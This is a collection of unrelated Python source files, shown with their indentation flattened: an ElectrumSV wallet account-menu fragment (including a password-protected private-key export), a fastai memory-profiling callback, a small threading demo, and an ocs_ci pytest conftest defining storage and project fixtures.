def _on_menu_import_invoices(self, account_id: int) -> None:
send_view = self._main_window.get_send_view(account_id)
send_view.import_invoices()
def _rename_account(self, account_id: int) -> None:
account = self._main_window._wallet.get_account(self._current_account_id)
new_account_name = line_dialog(self, _("Rename account"), _("Account name"), _("OK"),
account.get_name())
if new_account_name is None:
return
account.set_name(new_account_name)
account_row = self._account_ids.index(account_id)
item: QListWidgetItem = self._selection_list.item(account_row)
item.setText(new_account_name)
def _show_account_information(self, account_id: int) -> None:
dialog = AccountDialog(self._main_window, self._wallet, account_id, self)
dialog.exec_()
def _generate_destinations(self, account_id) -> None:
from . import payment_destinations_dialog
from importlib import reload
reload(payment_destinations_dialog)
dialog = payment_destinations_dialog.PaymentDestinationsDialog(self._main_window,
self._wallet, account_id, self)
dialog.exec_()
def _can_view_secured_data(self, account: AbstractAccount) -> None:
return not account.is_watching_only() and not isinstance(account, MultisigAccount) \
and not account.involves_hardware_wallet() \
and account.type() != AccountType.IMPORTED_PRIVATE_KEY
@protected
def _view_secured_data(self, main_window: ElectrumWindow, account_id: int=-1,
password: Optional[str]=None) -> None:
# account_id is a keyword argument so that 'protected' can identity the correct wallet
# window to do the password request in the context of.
account = self._wallet.get_account(account_id)
if self._can_view_secured_data(account):
keystore = account.get_keystore()
from .secured_data_dialog import SecuredDataDialog
d = SecuredDataDialog(self._main_window, self, keystore, password)
d.exec_()
else:
MessageBox.show_message(_("This type of account has no secured data. You are advised "
"to manually back up this wallet."), self._main_window.reference())
@protected
def _import_privkey(self, main_window: ElectrumWindow, account_id: int=-1,
password: Optional[str]=None) -> None:
# account_id is a keyword argument so that 'protected' can identity the correct wallet
# window to do the password request in the context of.
account = self._wallet.get_account(account_id)
title, msg = _('Import private keys'), _("Enter private keys")
self._main_window._do_import(title, msg,
lambda x: account.import_private_key(x, password))
def _import_addresses(self, account_id: int) -> None:
account = self._wallet.get_account(account_id)
title, msg = _('Import addresses'), _("Enter addresses")
def import_addr(addr):
address = address_from_string(addr)
if account.import_address(address):
return addr
# Show duplicate addition same as good addition.
return addr
self._main_window._do_import(title, msg, import_addr)
@protected
def _export_privkeys(self, main_window: ElectrumWindow, account_id: int=-1,
password: Optional[str]=None) -> None:
account = self._wallet.get_account(account_id)
if isinstance(self._wallet, MultisigAccount):
MessageBox.show_message(
_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.')
)
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "\n".join([
_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties.")
])
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrumsv-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(main_window.config, defaultname,
select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
keyinstance_ids = account.get_keyinstance_ids()
done = False
cancelled = False
def privkeys_thread():
for keyinstance_id in keyinstance_ids:
time.sleep(0.1)
if done or cancelled:
break
privkey = account.export_private_key(keyinstance_id, password)
script_template = account.get_script_template_for_id(keyinstance_id)
script_text = script_template_to_string(script_template)
private_keys[script_text] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join('{}\t{}'.format(script_text, privkey)
for script_text, privkey in private_keys.items())
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText(
"Please wait... %d/%d" % (len(private_keys),len(keyinstance_ids))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self._do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("ElectrumSV was unable to produce a private key-export."),
str(reason)
])
MessageBox.show_error(txt, title=_("Unable to create csv"))
except Exception as e:
MessageBox.show_message(str(e), main_window.reference())
return
MessageBox.show_message(_('Private keys exported'), main_window.reference())
def _do_export_privkeys(self, fileName: str, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["reference", "private_key"])
for key_text, pk in pklist.items():
transaction.writerow([key_text, pk])
else:
f.write(json.dumps(pklist, indent = 4))
|
mem.py
|
" Memory profiling callbacks "
import tracemalloc, threading, torch, time, pynvml
from ..utils.mem import *
from ..vision import *
#from ..basic_train import Learner, LearnerCallback
def preload_pytorch():
torch.ones((1, 1)).cuda()
def gpu_mem_get_used_no_cache():
torch.cuda.empty_cache()
return gpu_mem_get().used
def gpu_mem_used_get_fast(gpu_handle):
info = pynvml.nvmlDeviceGetMemoryInfo(gpu_handle)
return int(info.used/2**20)
if torch.cuda.is_available():
preload_pytorch()
pynvml.nvmlInit()
# XXX: to be migrated to docs:
# usage:
# learn = create_cnn(data, model, metrics=[accuracy], callback_fns=PeakMemMetric)
# learn.fit_one_cycle(3, max_lr=1e-2)
#
# output:
# Total time: 00:59
# epoch train_loss valid_loss accuracy cpu used peak gpu used peak
# 1 0.325806 0.070334 0.978800 0 2 80 6220
# 2 0.093147 0.038905 0.987700 0 2 2 914
# 3 0.047818 0.027617 0.990600 0 2 0 912
class PeakMemMetric(LearnerCallback):
"Callback that measures used and peaked general and GPU memory."
_order=-20 # Needs to run before the recorder
def __init__(self, learn:Learner):
super().__init__(learn)
assert torch.cuda.is_available(), "pytorch CUDA is required"
def peak_monitor_start(self):
self.peak_monitoring = True
# start RAM tracing
tracemalloc.start()
# this thread samples RAM usage as long as the current epoch of the fit loop is running
peak_monitor_thread = threading.Thread(target=self.peak_monitor_func)
peak_monitor_thread.daemon = True
peak_monitor_thread.start()
def peak_monitor_stop(self):
tracemalloc.stop()
self.peak_monitoring = False
def peak_monitor_func(self):
self.gpu_mem_used_peak = -1
gpu_id = torch.cuda.current_device()
gpu_handle = pynvml.nvmlDeviceGetHandleByIndex(gpu_id)
while True:
gpu_mem_used = gpu_mem_used_get_fast(gpu_handle)
self.gpu_mem_used_peak = max(gpu_mem_used, self.gpu_mem_used_peak)
if not self.peak_monitoring: break
time.sleep(0.001) # 1msec
def on_train_begin(self, **kwargs):
self.learn.recorder.add_metric_names(['cpu used', 'peak', 'gpu used', 'peak'])
def on_epoch_begin(self, **kwargs):
self.peak_monitor_start()
self.gpu_before = gpu_mem_get_used_no_cache()
def on_epoch_end(self, **kwargs):
cpu_current, cpu_peak = list(map(lambda x: int(x/2**20), tracemalloc.get_traced_memory()))
gpu_current = gpu_mem_get_used_no_cache() - self.gpu_before
gpu_peak = self.gpu_mem_used_peak - self.gpu_before
self.peak_monitor_stop()
# The numbers are deltas in MBs (beginning of the epoch and the end)
self.learn.recorder.add_metrics([cpu_current, cpu_peak, gpu_current, gpu_peak])
|
mtsleepD3.py
|
#!/usr/bin/env python
import threading
from time import sleep, ctime
loops = [4, 2]
class ThreadFunc(object):
def __init__(self, func, args, name=''):
self.name = name
self.func = func
self.args = args
def __call__(self):
self.func(*self.args)
def loop(nloop, nsec):
print('start loop', nloop, 'at:', ctime())
sleep(nsec)
print('loop', nloop, 'done at:', ctime())
def main():
print('starting at:', ctime())
threads = []
nloops = list(range(len(loops)))
for i in nloops: # create all threads
t = threading.Thread(
target=ThreadFunc(loop, (i, loops[i]),
loop.__name__))
threads.append(t)
for i in nloops: # start all threads
threads[i].start()
for i in nloops: # wait for completion
threads[i].join()
print('all DONE at:', ctime())
if __name__ == '__main__':
main()
|
conftest.py
|
import logging
import os
import random
import time
import tempfile
import threading
from concurrent.futures.thread import ThreadPoolExecutor
from datetime import datetime
from math import floor
from shutil import copyfile
from functools import partial
from botocore.exceptions import ClientError
import pytest
from collections import namedtuple
from ocs_ci.deployment import factory as dep_factory
from ocs_ci.framework import config
from ocs_ci.framework.pytest_customization.marks import (
deployment,
ignore_leftovers,
tier_marks,
ignore_leftover_label,
)
from ocs_ci.ocs import constants, defaults, fio_artefacts, node, ocp, platform_nodes
from ocs_ci.ocs.bucket_utils import craft_s3_command
from ocs_ci.ocs.exceptions import (
CommandFailed,
TimeoutExpiredError,
CephHealthException,
ResourceWrongStatusException,
UnsupportedPlatformError,
PoolDidNotReachReadyState,
StorageclassNotCreated,
PoolNotDeletedFromUI,
StorageClassNotDeletedFromUI,
)
from ocs_ci.ocs.mcg_workload import mcg_job_factory as mcg_job_factory_implementation
from ocs_ci.ocs.node import get_node_objs, schedule_nodes
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import pvc
from ocs_ci.ocs.utils import setup_ceph_toolbox, collect_ocs_logs
from ocs_ci.ocs.resources.backingstore import (
backingstore_factory as backingstore_factory_implementation,
)
from ocs_ci.ocs.resources.namespacestore import (
namespace_store_factory as namespacestore_factory_implementation,
)
from ocs_ci.ocs.resources.bucketclass import (
bucket_class_factory as bucketclass_factory_implementation,
)
from ocs_ci.ocs.resources.cloud_manager import CloudManager
from ocs_ci.ocs.resources.cloud_uls import (
cloud_uls_factory as cloud_uls_factory_implementation,
)
from ocs_ci.ocs.node import check_nodes_specs
from ocs_ci.ocs.resources.mcg import MCG
from ocs_ci.ocs.resources.objectbucket import BUCKET_MAP
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.ocs.resources.pod import (
get_rgw_pods,
delete_deploymentconfig_pods,
get_pods_having_label,
get_deployments_having_label,
Pod,
)
from ocs_ci.ocs.resources.pvc import PVC, create_restore_pvc
from ocs_ci.ocs.version import get_ocs_version, report_ocs_version
from ocs_ci.ocs.cluster_load import ClusterLoad, wrap_msg
from ocs_ci.utility import (
aws,
deployment_openshift_logging as ocp_logging_obj,
ibmcloud,
kms as KMS,
pagerduty,
reporting,
templating,
users,
version,
)
from ocs_ci.utility.environment_check import (
get_status_before_execution,
get_status_after_execution,
)
from ocs_ci.utility.flexy import load_cluster_info
from ocs_ci.utility.kms import is_kms_enabled
from ocs_ci.utility.prometheus import PrometheusAPI
from ocs_ci.utility.uninstall_openshift_logging import uninstall_cluster_logging
from ocs_ci.utility.utils import (
ceph_health_check,
ceph_health_check_base,
get_ocs_build_number,
get_running_ocp_version,
get_openshift_client,
get_system_architecture,
get_testrun_name,
load_auth_config,
ocsci_log_path,
skipif_ocp_version,
skipif_ocs_version,
TimeoutSampler,
skipif_upgraded_from,
update_container_with_mirrored_image,
skipif_ui_not_support,
)
from ocs_ci.helpers import helpers
from ocs_ci.helpers.helpers import (
create_unique_resource_name,
create_ocs_object_from_kind_and_name,
setup_pod_directories,
get_current_test_name,
)
from ocs_ci.ocs.bucket_utils import get_rgw_restart_counts
from ocs_ci.ocs.pgsql import Postgresql
from ocs_ci.ocs.resources.rgw import RGW
from ocs_ci.ocs.jenkins import Jenkins
from ocs_ci.ocs.amq import AMQ
from ocs_ci.ocs.elasticsearch import ElasticSearch
from ocs_ci.ocs.ui.base_ui import login_ui, close_browser
from ocs_ci.ocs.ui.block_pool import BlockPoolUI
from ocs_ci.ocs.ui.storageclass import StorageClassUI
from ocs_ci.ocs.couchbase_new import CouchBase
log = logging.getLogger(__name__)
class OCSLogFormatter(logging.Formatter):
def __init__(self):
fmt = (
"%(asctime)s - %(threadName)s - %(levelname)s - %(name)s.%(funcName)s.%(lineno)d "
"- %(message)s"
)
super(OCSLogFormatter, self).__init__(fmt)
def pytest_logger_config(logger_config):
logger_config.add_loggers([""], stdout_level="info")
logger_config.set_log_option_default("")
logger_config.split_by_outcome()
logger_config.set_formatter_class(OCSLogFormatter)
def pytest_collection_modifyitems(session, items):
"""
A pytest hook to filter out skipped tests satisfying
skipif_ocs_version, skipif_upgraded_from or skipif_no_kms
Args:
session: pytest session
config: pytest config object
items: list of collected tests
"""
teardown = config.RUN["cli_params"].get("teardown")
deploy = config.RUN["cli_params"].get("deploy")
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
# Add squad markers to each test item based on filepath
for item in items:
# check, if test already have squad marker manually assigned
if any(map(lambda x: "_squad" in x.name, item.iter_markers())):
continue
for squad, paths in constants.SQUADS.items():
for _path in paths:
# Limit the test_path to the tests directory
test_path = os.path.relpath(item.fspath.strpath, constants.TOP_DIR)
if _path in test_path:
item.add_marker(f"{squad.lower()}_squad")
item.user_properties.append(("squad", squad))
break
if not (teardown or deploy or (deploy and skip_ocs_deployment)):
for item in items[:]:
skipif_ocp_version_marker = item.get_closest_marker("skipif_ocp_version")
skipif_ocs_version_marker = item.get_closest_marker("skipif_ocs_version")
skipif_upgraded_from_marker = item.get_closest_marker(
"skipif_upgraded_from"
)
skipif_no_kms_marker = item.get_closest_marker("skipif_no_kms")
skipif_ui_not_support_marker = item.get_closest_marker(
"skipif_ui_not_support"
)
if skipif_ocp_version_marker:
skip_condition = skipif_ocp_version_marker.args
# skip_condition will be a tuple
# and condition will be first element in the tuple
if skipif_ocp_version(skip_condition[0]):
log.info(
f"Test: {item} will be skipped due to OCP {skip_condition}"
)
items.remove(item)
continue
if skipif_ocs_version_marker:
skip_condition = skipif_ocs_version_marker.args
# skip_condition will be a tuple
# and condition will be first element in the tuple
if skipif_ocs_version(skip_condition[0]):
log.info(f"Test: {item} will be skipped due to {skip_condition}")
items.remove(item)
continue
if skipif_upgraded_from_marker:
skip_args = skipif_upgraded_from_marker.args
if skipif_upgraded_from(skip_args[0]):
log.info(
f"Test: {item} will be skipped because the OCS cluster is"
f" upgraded from one of these versions: {skip_args[0]}"
)
items.remove(item)
if skipif_no_kms_marker:
try:
if not is_kms_enabled():
log.info(
f"Test: {item} it will be skipped because the OCS cluster"
f" has not configured cluster-wide encryption with KMS"
)
items.remove(item)
except KeyError:
log.warning(
"Cluster is not yet installed. Skipping skipif_no_kms check."
)
if skipif_ui_not_support_marker:
skip_condition = skipif_ui_not_support_marker
if skipif_ui_not_support(skip_condition.args[0]):
log.info(
f"Test: {item} will be skipped due to UI test {skip_condition.args} is not available"
)
items.remove(item)
continue
# skip UI test on openshift dedicated ODF-MS platform
if (
config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM
or config.ENV_DATA["platform"].lower() == constants.ROSA_PLATFORM
):
for item in items.copy():
if "/ui/" in str(item.fspath):
log.info(
f"Test {item} is removed from the collected items"
f" UI is not supported on {config.ENV_DATA['platform'].lower()}"
)
items.remove(item)
@pytest.fixture()
def supported_configuration():
"""
Check that cluster nodes have enough CPU and Memory as described in:
https://access.redhat.com/documentation/en-us/red_hat_openshift_container_storage/4.2/html-single/planning_your_deployment/index#infrastructure-requirements_rhocs
This fixture is intended as a prerequisite for tests or fixtures that
run flaky on configurations that don't meet minimal requirements.
Minimum requirements for each starting node (OSD+MON):
16 CPUs
64 GB memory
Last documentation check: 2020-02-21
"""
min_cpu = constants.MIN_NODE_CPU
min_memory = constants.MIN_NODE_MEMORY
log.info("Checking if system meets minimal requirements")
if not check_nodes_specs(min_memory=min_memory, min_cpu=min_cpu):
err_msg = (
f"At least one of the worker nodes doesn't meet the "
f"required minimum specs of {min_cpu} vCPUs and {min_memory} RAM"
)
pytest.xfail(err_msg)
@pytest.fixture(scope="session", autouse=True)
def auto_load_auth_config():
try:
auth_config = {"AUTH": load_auth_config()}
config.update(auth_config)
except FileNotFoundError:
pass # If auth file doesn't exist we just ignore.
@pytest.fixture(scope="class")
def secret_factory_class(request):
return secret_factory_fixture(request)
@pytest.fixture(scope="session")
def secret_factory_session(request):
return secret_factory_fixture(request)
@pytest.fixture(scope="function")
def secret_factory(request):
return secret_factory_fixture(request)
def secret_factory_fixture(request):
"""
Secret factory. Calling this fixture creates a new secret.
RBD based is default.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(interface=constants.CEPHBLOCKPOOL):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
"""
secret_obj = helpers.create_secret(interface_type=interface)
assert secret_obj, "Failed to create a secret"
instances.append(secret_obj)
return secret_obj
def finalizer():
"""
Delete the RBD secrets
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="session", autouse=True)
def log_ocs_version(cluster):
"""
Fixture handling version reporting for OCS.
This fixture handles alignment of the version reporting, so that we:
* report version for each test run (no matter if just deployment, just
test or both deployment and tests are executed)
* prevent conflict of version reporting with deployment/teardown (eg. we
should not run the version logging before actual deployment, or after
a teardown)
Version is reported in:
* log entries of INFO log level during test setup phase
* ocs_version file in cluster path directory (for copy pasting into bug
reports)
"""
teardown = config.RUN["cli_params"].get("teardown")
deploy = config.RUN["cli_params"].get("deploy")
dev_mode = config.RUN["cli_params"].get("dev_mode")
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
if teardown and not deploy:
log.info("Skipping version reporting for teardown.")
return
elif dev_mode:
log.info("Skipping version reporting for development mode.")
return
elif skip_ocs_deployment:
log.info("Skipping version reporting since OCS deployment is skipped.")
return
cluster_version, image_dict = get_ocs_version()
file_name = os.path.join(
config.ENV_DATA["cluster_path"], "ocs_version." + datetime.now().isoformat()
)
with open(file_name, "w") as file_obj:
report_ocs_version(cluster_version, image_dict, file_obj)
log.info("human readable ocs version info written into %s", file_name)
@pytest.fixture(scope="session")
def pagerduty_service(request):
"""
Create a Service in PagerDuty service. The service represents a cluster instance.
The service is deleted at the end of the test run.
Returns:
str: PagerDuty service json
"""
if config.ENV_DATA["platform"].lower() in constants.MANAGED_SERVICE_PLATFORMS:
pagerduty_api = pagerduty.PagerDutyAPI()
payload = pagerduty_api.get_service_dict()
service_response = pagerduty_api.create("services", payload=payload)
msg = f"Request {service_response.request.url} failed"
assert service_response.ok, msg
service = service_response.json().get("service")
def teardown():
"""
Delete the service at the end of test run
"""
service_id = service["id"]
log.info(f"Deleting service with id {service_id}")
delete_response = pagerduty_api.delete(f"services/{service_id}")
msg = f"Deletion of service {service_id} failed"
assert delete_response.ok, msg
request.addfinalizer(teardown)
return service
else:
log.info(
"PagerDuty service is not created because "
f"platform from {constants.MANAGED_SERVICE_PLATFORMS} "
"is not used"
)
return None
@pytest.fixture(scope="session", autouse=True)
def pagerduty_integration(request, pagerduty_service):
"""
Create a new Pagerduty integration for service from pagerduty_service
fixture if it doesn' exist. Update ocs-converged-pagerduty secret with
correct integration key. This is currently applicable only for ODF
Managed Service.
"""
if config.ENV_DATA["platform"].lower() in constants.MANAGED_SERVICE_PLATFORMS:
service_id = pagerduty_service["id"]
pagerduty_api = pagerduty.PagerDutyAPI()
log.info(
"Looking if Prometheus integration for pagerduty service with id "
f"{service_id} exists"
)
integration_key = None
for integration in pagerduty_service.get("integrations"):
if integration["summary"] == "Prometheus":
log.info(
"Prometheus integration already exists. "
"Skipping creation of new one."
)
integration_key = integration["integration_key"]
break
if not integration_key:
payload = pagerduty_api.get_integration_dict("Prometheus")
integration_response = pagerduty_api.create(
f"services/{service_id}/integrations", payload=payload
)
msg = f"Request {integration_response.request.url} failed"
assert integration_response.ok, msg
integration = integration_response.json().get("integration")
integration_key = integration["integration_key"]
pagerduty.set_pagerduty_integration_secret(integration_key)
def update_pagerduty_integration_secret():
"""
Make sure that pagerduty secret is updated with correct integration
token. Check value of config.RUN['thread_pagerduty_secret_update']:
* required - secret is periodically updated to correct value
* not required - secret is not updated
* finished - thread is terminated
"""
while config.RUN["thread_pagerduty_secret_update"] != "finished":
if config.RUN["thread_pagerduty_secret_update"] == "required":
pagerduty.set_pagerduty_integration_secret(integration_key)
time.sleep(60)
config.RUN["thread_pagerduty_secret_update"] = "not required"
thread = threading.Thread(
target=update_pagerduty_integration_secret,
name="thread_pagerduty_secret_update",
)
def finalizer():
"""
Stop the thread that executed update_pagerduty_integration_secret()
"""
config.RUN["thread_pagerduty_secret_update"] = "finished"
if thread:
thread.join()
request.addfinalizer(finalizer)
thread.start()
@pytest.fixture(scope="class")
def ceph_pool_factory_class(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
@pytest.fixture(scope="session")
def ceph_pool_factory_session(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
@pytest.fixture(scope="function")
def ceph_pool_factory(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
def ceph_pool_factory_fixture(request, replica=3, compression=None):
"""
Create a Ceph pool factory.
Calling this fixture creates new Ceph pool instance.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL, replica=replica, compression=compression
):
if interface == constants.CEPHBLOCKPOOL:
ceph_pool_obj = helpers.create_ceph_block_pool(
replica=replica, compression=compression
)
elif interface == constants.CEPHFILESYSTEM:
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM, namespace=defaults.ROOK_CLUSTER_NAMESPACE
).get(defaults.CEPHFILESYSTEM_NAME)
ceph_pool_obj = OCS(**cfs)
assert ceph_pool_obj, f"Failed to create {interface} pool"
if interface != constants.CEPHFILESYSTEM:
instances.append(ceph_pool_obj)
return ceph_pool_obj
def finalizer():
"""
Delete the Ceph block pool
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def storageclass_factory_class(request, ceph_pool_factory_class, secret_factory_class):
return storageclass_factory_fixture(
request, ceph_pool_factory_class, secret_factory_class
)
@pytest.fixture(scope="session")
def storageclass_factory_session(
request, ceph_pool_factory_session, secret_factory_session
):
return storageclass_factory_fixture(
request, ceph_pool_factory_session, secret_factory_session
)
@pytest.fixture(scope="function")
def storageclass_factory(request, ceph_pool_factory, secret_factory):
return storageclass_factory_fixture(request, ceph_pool_factory, secret_factory)
def storageclass_factory_fixture(
request,
ceph_pool_factory,
secret_factory,
):
"""
Create a storage class factory. Default is RBD based.
Calling this fixture creates new storage class instance.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
secret=None,
custom_data=None,
sc_name=None,
reclaim_policy=constants.RECLAIM_POLICY_DELETE,
replica=3,
compression=None,
new_rbd_pool=False,
pool_name=None,
rbd_thick_provision=False,
encrypted=False,
encryption_kms_id=None,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
secret (object): An OCS instance for the secret.
custom_data (dict): If provided then storageclass object is created
by using these data. Parameters `block_pool` and `secret`
are not useds but references are set if provided.
sc_name (str): Name of the storage class
replica (int): Replica size for a pool
compression (str): Compression type option for a pool
new_rbd_pool (bool): True if user wants to create new rbd pool for SC
pool_name (str): Existing pool name to create the storageclass other
then the default rbd pool.
rbd_thick_provision (bool): True to enable RBD thick provisioning.
Applicable if interface is CephBlockPool
encrypted (bool): True to enable RBD PV encryption
encryption_kms_id (str): Key value of vault config to be used from
csi-kms-connection-details configmap
Returns:
object: helpers.create_storage_class instance with links to
block_pool and secret.
"""
if custom_data:
sc_obj = helpers.create_resource(**custom_data)
else:
secret = secret or secret_factory(interface=interface)
if interface == constants.CEPHBLOCKPOOL:
if config.ENV_DATA.get("new_rbd_pool") or new_rbd_pool:
pool_obj = ceph_pool_factory(
interface=interface,
replica=config.ENV_DATA.get("replica") or replica,
compression=config.ENV_DATA.get("compression") or compression,
)
interface_name = pool_obj.name
else:
if pool_name is None:
interface_name = helpers.default_ceph_block_pool()
else:
interface_name = pool_name
elif interface == constants.CEPHFILESYSTEM:
interface_name = helpers.get_cephfs_data_pool_name()
sc_obj = helpers.create_storage_class(
interface_type=interface,
interface_name=interface_name,
secret_name=secret.name,
sc_name=sc_name,
reclaim_policy=reclaim_policy,
rbd_thick_provision=rbd_thick_provision,
encrypted=encrypted,
encryption_kms_id=encryption_kms_id,
)
assert sc_obj, f"Failed to create {interface} storage class"
sc_obj.secret = secret
instances.append(sc_obj)
return sc_obj
def finalizer():
"""
Delete the storageclass
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def project_factory_class(request):
return project_factory_fixture(request)
@pytest.fixture(scope="session")
def project_factory_session(request):
return project_factory_fixture(request)
@pytest.fixture()
def project_factory(request):
return project_factory_fixture(request)
@pytest.fixture()
def project(project_factory):
"""
This fixture creates a single project instance.
"""
project_obj = project_factory()
return project_obj
def project_factory_fixture(request):
"""
Create a new project factory.
Calling this fixture creates new project.
"""
instances = []
def factory(project_name=None):
"""
Args:
project_name (str): The name for the new project
Returns:
object: ocs_ci.ocs.resources.ocs instance of 'Project' kind.
"""
proj_obj = helpers.create_project(project_name=project_name)
instances.append(proj_obj)
return proj_obj
def finalizer():
delete_projects(instances)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def teardown_project_factory(request):
return teardown_project_factory_fixture(request)
def teardown_project_factory_fixture(request):
"""
Tearing down a project that was created during the test
To use this factory, you'll need to pass 'teardown_project_factory' to your test
function and call it in your test when a new project was created and you
want it to be removed in teardown phase:
def test_example(self, teardown_project_factory):
project_obj = create_project(project_name="xyz")
teardown_project_factory(project_obj)
"""
instances = []
def factory(resource_obj):
"""
Args:
resource_obj (OCP object or list of OCP objects) : Object to teardown after the test
"""
if isinstance(resource_obj, list):
instances.extend(resource_obj)
else:
instances.append(resource_obj)
def finalizer():
delete_projects(instances)
request.addfinalizer(finalizer)
return factory
def delete_projects(instances):
"""
Delete the project
instances (list): list of OCP objects (kind is Project)
"""
for instance in instances:
try:
ocp_event = ocp.OCP(kind="Event", namespace=instance.namespace)
events = ocp_event.get()
event_count = len(events["items"])
warn_event_count = 0
for event in events["items"]:
if event["type"] == "Warning":
warn_event_count += 1
log.info(
(
"There were %d events in %s namespace before it's"
" removal (out of which %d were of type Warning)."
" For a full dump of this event list, see DEBUG logs."
),
event_count,
instance.namespace,
warn_event_count,
)
except Exception:
# we don't want any problem to disrupt the teardown itself
log.exception("Failed to get events for project %s", instance.namespace)
ocp.switch_to_default_rook_cluster_project()
instance.delete(resource_name=instance.namespace)
instance.wait_for_delete(instance.namespace, timeout=300)
@pytest.fixture(scope="class")
def pvc_factory_class(request, project_factory_class):
return pvc_factory_fixture(request, project_factory_class)
@pytest.fixture(scope="session")
def pvc_factory_session(request, project_factory_session):
return pvc_factory_fixture(request, project_factory_session)
@pytest.fixture(scope="function")
def pvc_factory(request, project_factory):
return pvc_factory_fixture(
request,
project_factory,
)
def pvc_factory_fixture(request, project_factory):
"""
Create a persistent Volume Claim factory. Calling this fixture creates new
PVC. For custom PVC provide 'storageclass' parameter.
"""
instances = []
active_project = None
active_rbd_storageclass = None
active_cephfs_storageclass = None
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_mode=constants.ACCESS_MODE_RWO,
custom_data=None,
status=constants.STATUS_BOUND,
volume_mode=None,
size_unit="Gi",
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_mode (str): ReadWriteOnce, ReadOnlyMany or ReadWriteMany.
This decides the access mode to be used for the PVC.
ReadWriteOnce is default.
custom_data (dict): If provided then PVC object is created
by using these data. Parameters `project` and `storageclass`
are not used but reference is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
volume_mode (str): Volume mode for PVC.
eg: volume_mode='Block' to create rbd `block` type volume
size_unit (str): PVC size unit, eg: "Mi"
Returns:
object: helpers.create_pvc instance.
"""
if custom_data:
pvc_obj = PVC(**custom_data)
pvc_obj.create(do_reload=False)
else:
nonlocal active_project
nonlocal active_rbd_storageclass
nonlocal active_cephfs_storageclass
project = project or active_project or project_factory()
active_project = project
if interface == constants.CEPHBLOCKPOOL:
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
active_rbd_storageclass = storageclass
elif interface == constants.CEPHFILESYSTEM:
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
active_cephfs_storageclass = storageclass
pvc_size = f"{size}{size_unit}" if size else None
pvc_obj = helpers.create_pvc(
sc_name=storageclass.name,
namespace=project.namespace,
size=pvc_size,
do_reload=False,
access_mode=access_mode,
volume_mode=volume_mode,
)
assert pvc_obj, "Failed to create PVC"
if status:
helpers.wait_for_resource_state(pvc_obj, status)
pvc_obj.storageclass = storageclass
pvc_obj.project = project
pvc_obj.access_mode = access_mode
instances.append(pvc_obj)
return pvc_obj
def finalizer():
"""
Delete the PVC
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
# If they have ReclaimPolicy set to Retain then delete them manually
for pv_obj in pv_objs:
if (
pv_obj.data.get("spec").get("persistentVolumeReclaimPolicy")
== constants.RECLAIM_POLICY_RETAIN
):
helpers.wait_for_resource_state(pv_obj, constants.STATUS_RELEASED)
pv_obj.delete()
pv_obj.ocp.wait_for_delete(pv_obj.name)
else:
pv_obj.ocp.wait_for_delete(resource_name=pv_obj.name, timeout=180)
request.addfinalizer(finalizer)
return factory
